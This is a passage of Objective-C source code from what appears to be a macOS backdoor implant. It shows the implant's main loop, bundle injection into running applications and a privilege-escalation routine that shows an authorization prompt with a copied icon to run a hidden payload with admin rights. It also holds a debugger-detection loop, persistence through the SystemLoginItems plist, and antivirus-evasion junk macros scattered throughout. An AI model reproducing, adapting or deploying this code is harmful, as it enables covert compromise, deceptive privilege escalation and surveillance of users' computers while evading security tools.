    taskManager.mBackdoorControlFlag = mMainLoopControlFlag;
    [gControlFlagLock unlock];
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    __m_MInfoManager *infoManager = [[__m_MInfoManager alloc] init];
    [infoManager logActionWithDescription: @"Start"];
    [infoManager release];
    
    // AV evasion: only on release build
    AV_GARBAGE_009
    
    // Main backdoor loop
    [self _communicateWithAgents];
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    [innerPool release];
    
    return YES;
}

- (BOOL)isCrisisNetApp: (NSString*)appName
{
    if (gAgentCrisisNet == nil)
        return NO;
    
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    for (int i=0; i<[gAgentCrisisNet count]; i++)
    {
        NSString *tmpAppName = [gAgentCrisisNet objectAtIndex: i];
        if ([appName isCaseInsensitiveLike: tmpAppName])
            return YES;
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    return NO;
}

- (void)willStopCrisis: (NSNotification*)notification
{
    NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    NSDictionary *appInfo = [notification userInfo];
    
#ifdef DEBUG_CORE
    infoLog(@"try to stop crisis agent sync for app %@ (gAgentCrisis)", appInfo, gAgentCrisis);
#endif
    
    
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    if ((gAgentCrisis & CRISIS_SYNC) &&
        [self isCrisisNetApp: [appInfo objectForKey: @"NSApplicationName"]])
    {
        
        // AV evasion: only on release build
        AV_GARBAGE_008
        
        gAgentCrisis = gAgentCrisis & ~CRISIS_SYNC;
#ifdef DEBUG_CORE
        infoLog(@"Sync enabled! gAgentCrisis = 0x%x", gAgentCrisis);
#endif
    }
    
    [pool release];
}

- (BOOL)isCrisisHookApp: (NSString*)appName
{
    
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    if (gAgentCrisisApp == nil)
        return NO;
    
    for (int i=0; i<[gAgentCrisisApp count]; i++)
    {
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        NSString *tmpAppName = [gAgentCrisisApp objectAtIndex: i];
        if ([appName isCaseInsensitiveLike: tmpAppName])
            return YES;
    }
    
    return NO;
}

- (void)injectBundle: (NSNotification*)notification
{
    NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
    
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    NSDictionary *appInfo = [notification userInfo];
    
    if ([self isInjectable:[appInfo objectForKey:@"NSApplicationName"]] == FALSE)
        return;
    
    // AV evasion: only on release build
    AV_GARBAGE_008
    
    if (appInfo == nil)
    {
        [pool release];
        return;
    }
    
#ifdef DEBUG_CORE
    infoLog(@"running new notificaion on app %@ ", appInfo);
#endif
    
    if ((gAgentCrisis & CRISIS_START) &&
        [self isCrisisNetApp: [appInfo objectForKey: @"NSApplicationName"]])
    {
        // AV evasion: only on release build
        AV_GARBAGE_009
        
        gAgentCrisis |= CRISIS_SYNC;
#ifdef DEBUG_CORE
        infoLog(@"Sync disabled! gAgentCrisis = 0x%x", gAgentCrisis);
#endif
    }
    
    if ((gAgentCrisis & CRISIS_START) &&
        [self isCrisisHookApp: [appInfo objectForKey: @"NSApplicationName"]])
    {
#ifdef DEBUG_CORE
        infoLog(@"NSApplicationName match! skipping injection! CRISIS_SYNC = 0x%x", gAgentCrisis);
#endif
        return;
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    if ([gUtil isLeopard] && (getuid() == 0 || geteuid() == 0))
    {
#ifdef DEBUG_CORE
        infoLog(@"im root!");
#endif
        // Only for leopard send pid to new activity monitor via shmem
        if ([[appInfo objectForKey: @"NSApplicationName"] isCaseInsensitiveLike: @"Activity Monitor"])
        {
            
            // AV evasion: only on release build
            AV_GARBAGE_002
            
            // Write command with pid
            [self shareCorePidOnShMem];
        }
    }
    else
    {
#ifdef DEBUG_CORE
        infoLog(@"sendEventToPid");
#endif
        
        // AV evasion: only on release build
        AV_GARBAGE_009
        
        // temporary thread for fixing euid/uid escalation
        pid_t tmpPid =  [[appInfo objectForKey: @"NSApplicationProcessIdentifier"] intValue];
        NSNumber *thePid = [[NSNumber alloc] initWithInt: tmpPid];
        
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        [self sendEventToPid: thePid];
        
        [thePid release];
    }
    
    sleep(1);
    
    // run on every platform
    if ([[appInfo objectForKey: @"NSApplicationName"] isCaseInsensitiveLike: @"Activity Monitor"])
    {
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        // Write command with pid
        [self shareCorePidOnShMem];
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    [pool release];
}

- (void)shareCorePidOnShMem
{
    NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    NSMutableData *pidCommand = [[NSMutableData alloc] initWithLength: sizeof(shMemoryCommand)];
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    pid_t amPid = getpid();
    
#ifdef DEBUG_CORE
    infoLog(@"sending pid to activity monitor %d", amPid);
#endif
    
    shMemoryCommand *shMemoryHeader   = (shMemoryCommand *)[pidCommand bytes];
    shMemoryHeader->agentID           = AGENT_URL;
    shMemoryHeader->direction         = D_TO_AGENT;
    shMemoryHeader->command           = CR_CORE_PID;
    shMemoryHeader->commandDataSize   = sizeof(pid_t);
    memcpy(shMemoryHeader->commandData, &amPid, sizeof(pid_t));
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    if ([gSharedMemoryCommand writeMemory: pidCommand
                                   offset: OFFT_CORE_PID
                            fromComponent: COMP_CORE] == TRUE)
    {
#ifdef DEBUG_CORE
        infoLog(@"running pid %d to activity monitor", amPid);
#endif
    }
    else
    {
#ifdef DEBUG_CORE
        infoLog(@"running pid to activity monitor failed");
#endif
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_009
    
    [pidCommand release];
    [pool release];
}

- (void)UISudoWhileAlreadyAuthorized: (BOOL)amIAlreadyAuthorized
{
    AuthorizationRef myAuthorizationRef;
    
    OSStatus myStatus;
    FILE *myCommunicationsPipe  = NULL;
    NSString *execPath          = nil;
    
    //AuthorizationExternalForm extAuth;
    char myReadBuffer[256];
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    //
    // ExtendRights here is used in order to do the infamous sudo
    //
    AuthorizationFlags myFlags = kAuthorizationFlagDefaults
    | kAuthorizationFlagInteractionAllowed
    //| kAuthorizationFlagPreAuthorize
    | kAuthorizationFlagExtendRights;
    
    
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    
    //
    // Looks like icns files don't work here .. Only tif(f) atm
    //
    NSString *iconDestinationPath = [[[[[[NSBundle mainBundle] bundlePath]
                                        stringByDeletingLastPathComponent]
                                       stringByDeletingLastPathComponent]
                                      stringByDeletingLastPathComponent]
                                     stringByAppendingPathComponent: @"_sys.tiff"];
    
    // AV evasion: only on release build
    AV_GARBAGE_005
    
    NSString *iconCurrentPath = [[[NSBundle mainBundle] bundlePath]
                                 stringByAppendingPathComponent: ICON_FILENAME];
    
    // If we're authorized we can execute now our backdoor properly
    if (amIAlreadyAuthorized == YES)
    {
#ifdef DEBUG_CORE
        infoLog(@"Already authorized, relaunching the original file");
#endif
        
        // AV evasion: only on release build
        AV_GARBAGE_001
        
        NSString *searchPattern = [[NSString alloc] initWithFormat: @"%@/*.ez",
                                   [[NSBundle mainBundle] bundlePath]];
        
        // AV evasion: only on release build
        AV_GARBAGE_003
        
        NSArray *_searchedFile = searchForProtoUpload(searchPattern);
        [searchPattern release];
        
        
        // AV evasion: only on release build
        AV_GARBAGE_009
        
        [[NSFileManager defaultManager] removeItemAtPath: iconDestinationPath
                                                   error: nil];
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        if ([_searchedFile count] > 0)
        {
            execPath = [[_searchedFile objectAtIndex: 0]
                        stringByReplacingOccurrencesOfString: @".ez"
                        withString: @""];
#ifdef DEBUG_CORE
            infoLog(@"execPath: %@", execPath);
#endif
        }
        else
        {
#ifdef DEBUG_CORE
            errorLog(@"ez file not found");
#endif
            exit(-1);
        }
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_006
    
    [[NSFileManager defaultManager] copyItemAtPath: iconCurrentPath
                                            toPath: iconDestinationPath
                                             error: nil];
    
    //
    // Looks like the common practice is to split the AuthorizationItem Rights
    // from the AuthorizationItem Environment since we need to pass 2 different
    // objects later on while calling AuthorizationCopyRights
    //
    AuthorizationItem myItems;
    myItems.name         = kAuthorizationRightExecute; // system.privilege.admin
    myItems.valueLength  = 0;
    myItems.value        = NULL;
    myItems.flags        = 0;
    
    //
    // Authentication Icon
    //
    AuthorizationItem myAuthItems;
    myAuthItems.name          = kAuthorizationEnvironmentIcon;
    myAuthItems.valueLength   = strlen((char *)[iconDestinationPath UTF8String]);
    myAuthItems.value         = (char *)[iconDestinationPath UTF8String];
    myAuthItems.flags         = 0;
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    AuthorizationRights myRights;
    myRights.count = 1;
    myRights.items = &myItems;
    
    AuthorizationEnvironment authEnvironment;
    authEnvironment.count = 1;
    authEnvironment.items = &myAuthItems;
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
#ifdef DEBUG_CORE
    infoLog(@"Creating authorization");
#endif
    
    //
    // Create an empty auth ref to fill later
    //
    myStatus = AuthorizationCreate(&myRights,
                                   //kAuthorizationEmptyEnvironment,
                                   &authEnvironment,
                                   myFlags,
                                   &myAuthorizationRef);
    
    // AV evasion: only on release build
    AV_GARBAGE_009
    
    //
    // errAuthorizationSuccess returned in case of success
    //
    if (myStatus != errAuthorizationSuccess)
    {
#ifdef DEBUG_CORE
        errorLog(@"Error while creating the empty Authorization Reference");
#endif
        //return myStatus;
    }
    /*
     myStatus = AuthorizationCopyRights(myAuthorizationRef,
     &myRights,
     //kAuthorizationEmptyEnvironment,
     &authEnvironment,
     myFlags,
     NULL);
     
     if (myStatus != errAuthorizationSuccess)
     {
     #ifdef DEBUG_UI_SPOOF
     errorLog(@"[EE] Error while authorizing the user");
     #endif
     
     [self _createInternalFilesAndFolders];
     
     //
     // Only perform SLI escalation on 10.5 since it doesn't seem to work
     // on 10.6
     //
     if (gOSMajor == 10 && gOSMinor == 5)
     {
     if ([self getRootThroughSLI] == YES)
     {
     #ifdef DEBUG_CORE
     warnLog(@"Err on auth, switching to SLI PLIST mode");
     #endif
     [gUtil dropExecFlag];
     }
     }
     
     [[NSFileManager defaultManager] removeItemAtPath: iconDestinationPath
     error: nil];
     
     exit(-1);
     }*/
    /*  
     //
     // Turn an AuthorizationRef into an external "byte blob" form so it can be
     // passed over the authenticated execution
     //
     myStatus = AuthorizationMakeExternalForm(myAuthorizationRef, &extAuth);
     if (myStatus != errAuthorizationSuccess)
     {
     #ifdef DEBUG_UI_SPOOF
     errorLog(@"Unable to turn the AuthorizationRef into external form");
     #endif
     }*/
    
    if (execPath == nil)
    {
        // AV evasion: only on release build
        AV_GARBAGE_003
        
        if ([gUtil isLeopard])
        {
            // AV evasion: only on release build
            AV_GARBAGE_002
            
            NSString *searchPattern = [[NSString alloc] initWithFormat: @"%@/*.ez",
                                       [[NSBundle mainBundle] bundlePath]];
            
            NSArray *_searchedFile = searchForProtoUpload(searchPattern);
            [searchPattern release];
            
            // AV evasion: only on release build
            AV_GARBAGE_002
            
            [[NSFileManager defaultManager] removeItemAtPath: iconDestinationPath
                                                       error: nil];
            
            // AV evasion: only on release build
            AV_GARBAGE_007
            
            if ([_searchedFile count] > 0)
            {
                execPath = [[_searchedFile objectAtIndex: 0]
                            stringByReplacingOccurrencesOfString: @".ez"
                            withString: @""];
            }
            else
            {
#ifdef DEBUG_CORE
                errorLog(@"ez file not found");
#endif
                exit(-1);
            }
        }
        else
        {
            
            // AV evasion: only on release build
            AV_GARBAGE_001
            
            execPath = [NSString stringWithFormat: @"%@",
                        [[[NSBundle mainBundle] bundlePath]
                         stringByAppendingPathComponent: @"System Preferences"]];
        }
    }
    
#ifdef DEBUG_CORE
    infoLog(@"Executing with auth (%@)", execPath);
#endif
    
    // AV evasion: only on release build
    AV_GARBAGE_004
    
    myStatus = AuthorizationExecuteWithPrivileges(myAuthorizationRef,
                                                  (char *)[execPath UTF8String],
                                                  kAuthorizationFlagDefaults,
                                                  nil,
                                                  &myCommunicationsPipe);
    
    if (myStatus != errAuthorizationSuccess)
    {
#ifdef DEBUG_CORE
        errorLog(@"Error on last step");
#endif
    }
    else
    {
#ifdef DEBUG_CORE
        infoLog(@"Auth executed with success (%s)", myReadBuffer);
#endif
        
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        read(fileno(myCommunicationsPipe), myReadBuffer, sizeof(myReadBuffer));
        fclose(myCommunicationsPipe);
    }
    
    [[NSFileManager defaultManager] removeItemAtPath: iconDestinationPath
                                               error: nil];
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    //
    // Free the AuthorizationRef
    //
    AuthorizationFree(myAuthorizationRef, kAuthorizationFlagDestroyRights);
    
#ifdef DEBUG_CORE
    warnLog(@"Quitting from auth");
#endif
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    exit(0);
}

//
// See http://developer.apple.com/qa/qa2004/qa1361.html
//
- (void)xfrth
{
    while (true)
    {
        int                 junk;
        int                 mib[4];
        struct kinfo_proc   info;
        size_t              size;
        
        // AV evasion: only on release build
        AV_GARBAGE_001
        
        //
        // Initialize the flags so that, if sysctl fails for some bizarre
        // reason, we get a predictable result.
        //
        info.kp_proc.p_flag = 0;
        
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        //
        // Initialize mib, which tells sysctl the info we want, in this case
        // we're looking for information about a specific process ID. 
        //
        mib[0] = CTL_KERN;
        mib[1] = KERN_PROC;
        mib[2] = KERN_PROC_PID;
        mib[3] = getpid();
        
        // AV evasion: only on release build
        AV_GARBAGE_004
        
        // Call sysctl
        size = sizeof(info);
        junk = sysctl(mib, sizeof(mib) / sizeof(*mib), &info, &size, NULL, 0);
        
        // AV evasion: only on release build
        AV_GARBAGE_007
        
        // We're being debugged if the P_TRACED flag is set
        if ((info.kp_proc.p_flag & P_TRACED) != 0)
        {
            exit(-1);
        }
        
        // AV evasion: only on release build
        AV_GARBAGE_003
        
        usleep(50000);
    }
}

- (BOOL)getRootThroughSLI
{
    return NO;
    
    NSError *error;
    BOOL success;
    NSFileManager *fileManager = [NSFileManager defaultManager];
    
    // AV evasion: only on release build
    AV_GARBAGE_006
    
    //
    // Check if the SLI file already exists
    //
    if ([fileManager fileExistsAtPath: [gUtil mSLIPlistPath]
                          isDirectory: NULL])
    {
#ifdef DEBUG_CORE
        infoLog(@"SLI File already exists!");
#endif
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        success = [gUtil isBackdoorPresentInSLI: [[NSBundle mainBundle] bundlePath]];
        
        if (success == NO)
        {
#ifdef DEBUG_CORE
            infoLog(@"Backdoor is not present in SLI");
#endif
            NSString *SLIBackup       = @"com.apple.SystemLoginItems.plist_bak";
            
            // AV evasion: only on release build
            AV_GARBAGE_004
            
            NSString *SLIDestination  = @"com.apple.SystemLoginItems.plist";
            
            //
            // Create a backup of the original SLI Plist in our current folder
            //
            [fileManager copyItemAtPath: [gUtil mSLIPlistPath]
                                 toPath: SLIBackup
                                  error: &error];
            
            // AV evasion: only on release build
            AV_GARBAGE_003
            
            if ([gUtil addBackdoorToSLIPlist] == NO)
            {
#ifdef DEBUG_CORE
                errorLog(@"An error occurred while adding the entry to the SLI plist");
#endif
                return NO;
            }
            
            //
            // Copy back the SLI file (we need first to remove the file)
            // ffs overwrite capability anybody @APPLE?
            //
            if ([fileManager removeItemAtPath: [gUtil mSLIPlistPath]
                                        error: &error] == YES)
            {
                // AV evasion: only on release build
                AV_GARBAGE_002
                if ([fileManager moveItemAtPath: SLIDestination
                                         toPath: [gUtil mSLIPlistPath]
                                          error: &error] == NO)
                {
#ifdef DEBUG_CORE
                    errorLog(@"Error while moving back the modified SLI plist (%s)", error);
#endif
                    
                    return NO;
                }
            }
            else
            {
#ifdef DEBUG_CORE
                errorLog(@"Error while removing the original SLI plist (%s)", error);
#endif
                
                return NO;
            }
        }
        else
        {
            // 
            // Probably here we should backup the SLI and clean it up from our
            // backdoor entry
            //
#ifdef DEBUG_CORE
            infoLog(@"Backdoor is already installed in global SLI");
#endif
        }
    }
    else
    {
        // The SLI plist doesn't exists yet
#ifdef DEBUG_CORE
        infoLog(@"SLI File doesn't exists");
#endif
        // AV evasion: only on release build
        AV_GARBAGE_001
        
        //
        // Create the SLI plist from scratch
        //
        return [gUtil createSLIPlistWithBackdoor];
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    return YES;
}


@end